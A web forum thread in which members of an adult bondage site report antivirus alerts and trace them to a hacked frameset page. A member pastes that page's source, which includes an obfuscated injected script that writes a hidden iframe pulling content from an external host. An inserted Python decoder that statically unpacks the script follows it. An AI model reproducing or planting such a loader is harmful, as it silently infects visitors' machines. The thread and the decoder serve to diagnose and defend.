Virus warning!

Post your feedback, thoughts, questions and ideas on the main site here.
anna
Site Admin
Posts: 1842
Joined: 06 Mar 2006, 22:42
Location: European Union

Virus warning!

Post by anna »

I have received a warning from a member here that his/her virus program has warned about a virus somewhere on the boundanna.com or .net sites. (Possibly also this forum.) The threat was called Trojan-Downloader.HTML.IFrame.iu.

The exact page that triggered the warning is unknown to me at this time, but I have done some checking around and found nothing fishy. Warnings like this are often false alarms but should not be neglected. Please always use an up-to-date operating system, up-to-date virus protection and a good firewall to protect yourself while connected. Also consider using an alternative web browser if you are using Explorer, as it seems this browser is a favorite target.

I will continue to search for the cause of this warning, but please let me know if any of you notice anything fishy.
Grinser
Posts: 414
Joined: 09 Jul 2007, 22:25

Post by Grinser »

I agree, I keep getting warnings from my antivirus program every time I refresh the forum index.

To be specific, the threats are JS/Psyme and JS/Downloader-Agent, located in my Opera cache. Since I got the message three times in a row after refreshing this page, it seems the virus is creeping around somewhere in here.
There is a beast inside man that should be exercised, not exorcised.
cdinbonds
Posts: 2391
Joined: 08 Apr 2006, 21:12
Location: South Central Washington

Post by cdinbonds »

I've gotten the warning when I log in (automatically) to the forum. The first time I wasn't sure it was coming from here, but when it happened again at log-in I was pretty sure. I was about to send a note about it when I saw this thread.
There's a fine line between cuddling and holding someone down so they can't get away.
The beatings will continue until morale improves.
Do not meddle in the affairs of dragons - for you are crunchy and good with ketchup.
bound_jenny
Moderator
Posts: 10268
Joined: 09 Dec 2007, 12:37
Location: Montreal, Canada, Great Kinky North

Post by bound_jenny »

I got a warning about a blocked address from my anti-threat package every time I go to or refresh the main forum page.

The address is search-you-need.com/fram.js and the IP is 58.65.239.126:80.

A quick search on my favorite search engine brings up "Nuded Britney Spears" that is 100% checked by antivirus (yeah, right) and an untitled download link. Sounds like a malware site to me.

So far I don't seem to get it from any of the subforums or threads. I'll keep an eye out for anything else suspicious.

Jenny.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
teh-ah-tim-eh
Posts: 183
Joined: 30 Jul 2008, 03:49
Location: Hull, England

Post by teh-ah-tim-eh »

hmm...mine seems to find none of these :S

And I haven't had any attempts on favorites or anything. I'll keep a lookout, though.
anna
Site Admin
Posts: 1842
Joined: 06 Mar 2006, 22:42
Location: European Union

The hacking.

Post by anna »

Thank you all for the help locating this issue. It has been fixed now and I sincerely hope that no one has been infected by anything because of this.

Anna
cdinbonds
Posts: 2391
Joined: 08 Apr 2006, 21:12
Location: South Central Washington

Post by cdinbonds »

Good job Anna, thanks! :D
There's a fine line between cuddling and holding someone down so they can't get away.
The beatings will continue until morale improves.
Do not meddle in the affairs of dragons - for you are crunchy and good with ketchup.
Fesselfan
Posts: 38
Joined: 18 Aug 2008, 09:39
Location: Germany

Post by Fesselfan »

IFrames in general are embedded frames within HTML code. Internet Explorer is well known for bugs in handling them, allowing the execution of program code from a remote site.

So, if (on any page) your antivirus pops a warning about that, better block that link.

And it doesn't need to have anything to do with the actual site... it can be a commercial banner, the hoster's page or zillions of other locations.

Cheers

FF
"Do you suffer from perverted fantasies?"
"Suffer? I whoefully enjoy them!"
Ilse
Posts: 10
Joined: 21 Apr 2008, 12:45
Location: Netherlands

Post by Ilse »

www.boundanna.net is blocked by my scanner, which says VBS:Malware-gen.
bound_jenny
Moderator
Posts: 10268
Joined: 09 Dec 2007, 12:37
Location: Montreal, Canada, Great Kinky North

Post by bound_jenny »

Nothing here. My protection suite has no complaint.

Jenny.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
Ilse
Posts: 10
Joined: 21 Apr 2008, 12:45
Location: Netherlands

virus warning

Post by Ilse »

I've asked a friend who does ICT thingies to look at it, since I'm always really scared about viruses :oops:
He said there is a suspicious encrypted iframe in http://www.boundanna.net/html/frameset.html, and then he did a scan on that file with 36 different scanners; 13 reported a virus alert on it.
bound_jenny
Moderator
Posts: 10268
Joined: 09 Dec 2007, 12:37
Location: Montreal, Canada, Great Kinky North

Post by bound_jenny »

I just took a look at the source of both frames of the main page and they're both only plain HTML - totally harmless.

If only 13 of the 36 reported a virus, it could be a false alarm, unless it's another page you haven't yet specified (like one of the pages accessible from the left-hand frame).

Jenny.
Forum Moderator.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
Ilse
Posts: 10
Joined: 21 Apr 2008, 12:45
Location: Netherlands

Post by Ilse »

The block with the % things in it? It isn't just text:

<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="Adobe PageMill 3.0 Win">
<TITLE>boundanna.com</TITLE>
<LINK REL="shortcut icon" HREF="../favicon.ico">
<LINK REL="meta" HREF="http://www.boundanna.com/labels.rdf" TYPE="application/rdf+xml" TITLE="ICRA labels" /><!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->
</HEAD>
<FRAMESET FRAMEBORDER=1 COLS="150,38%">
<FRAME SRC="en_navigation.html" NAME="navigation" NORESIZE>
<FRAME SRC="en_main.html" NAME="contents" NORESIZE>
<NOFRAMES>
<BODY>
Viewing this page requires a browser capable of displaying frames.
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
ponylady
Moderator
Posts: 3827
Joined: 26 Dec 2007, 20:52
Location: germany

Re: virus warning

Post by ponylady »

Ilse wrote: I've asked a friend who does ICT thingies to look at it, since I'm always really scared about viruses :oops:
He said there is a suspicious encrypted iframe in http://www.boundanna.net/html/frameset.html, and then he did a scan on that file with 36 different scanners; 13 reported a virus alert on it.
Aaah, I see. You are referring to the main site, not the board.

If you are afraid of that iframe, use this direct link to the board itself in the future, instead of coming in over the main page:

http://forum.boundanna.net/forum/index.php

By the way, this doesn't look encrypted to me, but more like ASCII codes for glyphs, meaning %40 stands for "@", for example.

Hope that helps.

A reason for the virus alerts could be that the heuristics have been set to the highest level. In this setting most AVs are very sensitive to "botched" code.
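Ilse's frameset.html source and ponylady's point about %-codes can both be checked without loading anything in a browser. The Python below is an added example (not from the thread or the site): it statically peels the eval(unescape("...")) and document.write('...') layers of that exact script block and reports what the emitted iframe points at; the regexes and the "hidden iframe" heuristic are my own assumptions, and the script text is copied from the post above.

```python
import re
from urllib.parse import unquote

# The <script> body exactly as posted in Ilse's frameset.html source above.
OBFUSCATED_SCRIPT = 'eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));'

# Wrapper shapes this decoder recognises (assumed; extend for other loaders).
EVAL_UNESCAPE_RE = re.compile(r'\s*eval\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)\s*;?\s*$')
DOC_WRITE_RE = re.compile(r"\s*document\.write\s*\(\s*'([^']*)'\s*\)\s*;?\s*$")

def js_unescape(s):
    """Emulate the legacy JavaScript unescape(): %uXXXX first, then %XX."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

def js_string_literal(s):
    """Resolve the \\uXXXX and \\xXX escapes a JS string literal would contain."""
    s = re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)

def peel(script, max_layers=10):
    """Statically unwrap eval(unescape(...)) and document.write(...) layers
    (no JavaScript is executed) and return (emitted_text, layer_names)."""
    layers, cur = [], script
    for _ in range(max_layers):
        m = EVAL_UNESCAPE_RE.match(cur)
        if m:
            cur, layers = js_unescape(m.group(1)), layers + ['eval(unescape)']
            continue
        m = DOC_WRITE_RE.match(cur)
        if m:
            cur, layers = js_string_literal(m.group(1)), layers + ['document.write']
            continue
        break
    return cur, layers

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

def find_iframes(html):
    """Return (src, hidden) per iframe; 'hidden' flags the 0x0 or display:none
    shape that injected drive-by frames typically use."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get('style', '').replace(' ', '').lower()
        hidden = (attrs.get('width') == '0' and attrs.get('height') == '0') \
            or 'display:none' in style
        found.append((attrs.get('src', ''), hidden))
    return found

def analyse(script):
    html, layers = peel(script)
    return {'layers': layers, 'html': html, 'iframes': find_iframes(html)}

if __name__ == '__main__':
    print(analyse(OBFUSCATED_SCRIPT))
```

For this block the decoder finds two layers and a single zero-size, display:none iframe loading a page from an external .cn host, which is why scanners flagged the file even though the surrounding frameset is plain HTML.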
bound_jenny
Moderator
Posts: 10268
Joined: 09 Dec 2007, 12:37
Location: Montreal, Canada, Great Kinky North

Post by bound_jenny »

I saved the page to disk and scanned it locally - no alarms.

Jenny.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!